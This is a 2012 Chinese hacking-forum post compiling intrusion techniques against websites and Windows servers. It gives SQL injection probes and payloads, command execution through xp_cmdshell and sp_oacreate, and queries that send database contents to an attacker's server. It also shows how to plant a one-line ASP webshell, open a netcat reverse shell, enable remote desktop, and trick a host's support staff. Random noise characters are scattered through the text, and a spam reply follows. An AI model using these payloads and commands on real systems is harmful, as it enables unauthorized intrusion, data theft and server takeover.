找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3992|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关
7 K1 m! y/ _( S) ]+ s- Z! {
, o9 K' \- e8 Y6 F* d; V. M% N2 o; A/ g; B/ b. k4 T: m2 H
SA点数据库分离搞法+语句:
/ L- q) [# V5 X' R8 N/ u  i  V1 t0 N
注射点不显错,执行下面三条语句页面都返回正常。
+ ^8 U8 n0 r) B0 d2 k/ u2 Yand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')8 Q) q8 j0 \+ }5 N# G  H- M
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'); `; E8 k  }8 c/ l
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
  \. e5 P3 o- A6 Z5 Y8 ], z# o可以列目录,判断系统为2000,web与数据库分离
# ^7 C/ A. ?0 V, C9 b/ [遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。7 }. t+ F! A6 j
在注射点上执行5 A2 p9 W) [% [  ]( a9 X: z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
+ J4 s$ N# f# w& s页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
7 T7 D  {- G8 J; M+ W: u$ H还有我用NC监听得其他端口都没有得到IP。3 p+ K- E! W* k: ?
9 i# i2 ?( M6 L& Q- M) l9 J
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
5 s) e4 F& S8 X1 \4 y'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
# J9 b  Y/ d) H- ~
2 J8 [' S' U1 Y" D' G;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
- z4 y9 b# G1 x3 n& y; K' |" s; Z1 ~
现在就猜想是不是数据库是内网而且不能连外网。' r8 G  y0 W9 w- Y8 w
# }! t1 @6 Z; f; e& \, z

$ \1 h' M4 A3 Y* u2 s$ c. Eaccess导出txt文本代码+ G8 b1 {' N3 o) D6 U0 U9 h* z
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin9 K5 _1 ~4 {) @0 q+ ~: S( u; G1 m2 M
# d3 V& Q) F  J: f' J

8 k' {6 ?! m  S" @# }+ j9 m& h. C  }9 Q  w
自动跳转到指定网站代码头
4 N; {3 }1 C$ b+ e<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>! L, D( }4 s* O6 Q1 l1 L
4 U$ D; R) v3 F0 L

* P3 g" i1 V2 [8 O# F0 `  g入侵java or jsp站点时默认配置文件路径:( V6 {+ j$ T2 T7 q
\web-inf\web.xml
2 T# i1 E2 E8 I6 `tomcat下的配置文件位置:4 @8 V3 p1 b7 N+ j3 c; s
\conf\server.xml            (前面加上tomcat路径)
9 }& `& X! [/ [1 s* Q  S\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
5 N" L5 f6 c" F2 j+ G
* N6 ?! Y3 w9 ^  }- V$ a1 H5 t6 n2 I: }& d! Q% g# i2 j! A$ j
6 y% ?7 ]/ X/ `& Y
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:* b% S7 |# U# I/ P
-1%23
/ k4 ~/ ]8 U/ S( ~3 _# v>
& E% c' Q6 e+ o/ i5 f3 P5 E<
; Y0 b6 U# o5 E, f$ l" w  K1'+or+'1'='1
2 X; V6 [6 e6 f1 j+ K" Lid=8%bf
& y( F7 _; {* p; h3 p0 b. p9 ~; k2 Y' E2 k: r# g) v
全新注入点检测试法:
2 t3 P! c% d# W- S在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。- @% [; m/ l. d' d' x

- ], m* L; Z* k在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
3 |; }. A$ h$ s* W* P9 z
5 r1 h- ^& e9 j  X7 J. |搜索型注入判断方法:% z# g+ n% y8 ^+ M$ R
北京%' and '1'='1' and '%'='2 l5 F: H) e3 M& t7 }
北京%' and '1'='2' and '%'='. v( r- s/ l4 X; @. l3 Y  d

( t6 P( N+ G" ?8 w) e2 g4 C+ s' Y7 F: _/ C/ V4 s! w# X) Y: R% ~
COOKIES注入:
  m+ C: i7 H  I% J4 A3 q
' g8 g2 u7 ^5 g5 Q: Cjavascript:alert(document.cookie="id="+escape("51 and 1=1"));5 Z+ J, O; q: q, S

! Y' Y) E4 G; S3 z+ B2000专业版查看本地登录用户命令:
% R; y, G& o. z4 c: w) Gnet config workstation
0 y0 g9 l! n' `7 H' W: j0 r8 P
: C- m0 Y# [4 ]9 o! t: U
  p/ M8 k- w( c; ?2 t4 Z* l2003下查看ipsec配置和默认防火墙配置命令:3 k" f, d. r! k6 v# s
netsh firewall show config
7 q9 _% s2 W, x+ w0 o/ n% lnetsh ipsec static show all
- P7 D. k# u: V+ @9 E. t1 p+ I/ D! d, y7 c5 n9 ^; l
不指派指定策略命令:- m& h) U1 @* k+ w3 p1 I; F# D
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
' \, [' M+ M2 x4 p7 i3 Y, ?netsh ipsec static show policy all  显示策略名
, T5 ~. E$ a9 A6 Y; r) j8 |8 b3 L" X  O$ c$ I6 `

% g* I+ Z  k; `+ ]2 E猜管理员后台小技巧:. T: m+ \% t6 c" s) |" I+ j0 I
admin/left.asp
% ~0 R$ y5 v( l: n+ b/ B4 z/ ?admin/main.asp; E: N+ G' U% o
admin/top.asp
$ B9 O' Z2 H0 yadmin/admin.asp 0 T2 t8 ~+ z: H1 q
会现出菜单导航,然后迅雷下载全部链接# |9 |, G: Q) [& q- t

& F9 V: O9 L* _  z1 D0 R  M
& |( @: o5 r0 X* }1 N" l' `社会工程学:
3 x4 V7 A+ E1 z. ?用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
6 G7 t9 Q& I, d7 w: b$ [) }  W. v然后去骗客服
$ n6 B% |7 Q1 Z9 \, J3 o  b
) K% ?8 I7 Y+ p' B/ B$ k- A
4 j+ Z: m; }3 l' s/ \/ p2 F$ E统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
9 _1 P  D2 E" Z7 ^查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, ( S( F: o4 S3 ]4 G; G6 L: r' [2 t% ~+ q
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。/ y: N0 a  e# C" ?

7 ?- h, A& i3 V! X  W2 t7 ]( l2 M/ G6 G+ @

' p" {9 m3 k' y- V9 x, G: j3 @6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
% p& e- M3 n7 _6 r  x: V& v* O' {6 U( `; @: H; E8 w

. b, M6 `* U5 |1 v1 s6 N1 K/ ?+ t6 X/ d! y; B/ F5 |
CMD加密注册表位置
5 h3 [: X# x* S  d8 v(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor5 d* X. h5 k' L8 c! w; p6 Y
AutoRun7 m  {, V" p+ l( e6 ^8 q
1 n; T2 U& Z- s2 s1 t' H5 v
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
' ~6 W$ i1 ]7 [! U- @AutoRun
+ Q% a4 I9 X( N) D5 b  C7 c8 D+ k5 |" @# p; W1 q
9 a' c% _% ^& m/ I, x8 n5 k7 _
在找注入时搜索Hidden,把他改成test
! }- q& c/ H. R4 J8 R% A! ?6 O8 I1 y/ ^5 n

% [0 ?/ |9 e6 J  q
2 p( D2 m0 j  P# u  o& A# E7 dmstsc /v:IP /console + M$ X9 C2 H' d) \2 z
3 @' s0 M% n! K( m; ?5 W9 \. T

' a5 E$ M) j# s8 z0 F3 B& _  Z% P1 @一句话开3389:1 J" `  }, W8 T  l& {. o5 C* O

' J; ?, M3 Q9 z( B  S# N  @最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
2 [5 L9 c8 p4 A4 R  o# \开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
* U/ @, O0 r& r: \/ y% e2 O+ ^7 F; |5 C8 O5 t, n

  G6 [- i3 V1 z7 d知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:/ a0 i3 S! p3 I5 U# z% B3 f: o
Insert into admin(user,pwd) values('test','test')/ O' K- Z0 M! M9 C1 f! [

! G1 b1 ~, T# ^4 j8 ~& S1 J; y! X
! q- L+ f6 S* J" VNC反弹
! S6 G; V5 g1 |" u7 s1 s$ I- K先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   ! l+ N& Z; c# V7 [4 x) [# i
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)! @3 J" B7 \2 l! X2 o% f! d
3 ]: r* F+ p- D% H. P7 W
& G# R6 p' ^+ V: w) o7 C
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题. ~- U/ N1 o& p1 C2 i9 Z& M! W2 l# T

* H2 N0 r/ M3 H  g  v; n: Y有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
( ~; {* T0 ]3 b例如:. B+ k: A1 i- d3 O  D
subst k: d:\www\ 用d盘www目录替代k盘1 I& `! u$ |7 x; c- q
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表